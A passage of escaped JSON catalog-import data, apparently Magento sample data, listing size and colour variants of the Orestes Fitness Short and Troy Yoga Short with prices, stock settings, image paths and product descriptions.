Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"924\":{\"sku\":\"MSH08-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short-34-Blue\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"925\":{\"sku\":\"MSH08-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short-34-Green\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"926\":{\"sku\":\"MSH08-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short-36-Black\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"927\":{\"sku\":\"MSH08-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short-36-Blue\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"928\":{\"sku\":\"MSH08-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short-36-Green\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-fitness-short-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"929\":{\"sku\":\"MSH08\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Fitness Short\",\"description\":\"<p>You\'re out of excuses not to run, lift, or play when you own a pair of the Orestes Fitness Short. You won\'t complain about the high-performance polyester wicking fabric, reflective safety trim or seamless built-in comfort brief, either.<\\/p>\\n<p>&bull; Black shorts with dark gray accents.<br \\/>&bull; Elasticized waistband with interior drawstring.<br \\/>&bull; Ventilating mesh detailing.<br \\/>&bull; 100% polyester and recycled polyester.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=LumaTech&trade;|Polyester,pattern=Solid,climate=All-weather|Indoor|Hot,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH08-32-Black,size=32,color=Black|sku=MSH08-32-Blue,size=32,color=Blue|sku=MSH08-32-Green,size=32,color=Green|sku=MSH08-33-Black,size=33,color=Black|sku=MSH08-33-Blue,size=33,color=Blue|sku=MSH08-33-Green,size=33,color=Green|sku=MSH08-34-Black,size=34,color=Black|sku=MSH08-34-Blue,size=34,color=Blue|sku=MSH08-34-Green,size=34,color=Green|sku=MSH08-36-Black,size=36,color=Black|sku=MSH08-36-Blue,size=36,color=Blue|sku=MSH08-36-Green,size=36,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"LumaTech&trade;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"930\":{\"sku\":\"MSH09-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-32-Black\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"931\":{\"sku\":\"MSH09-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-32-Blue\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"c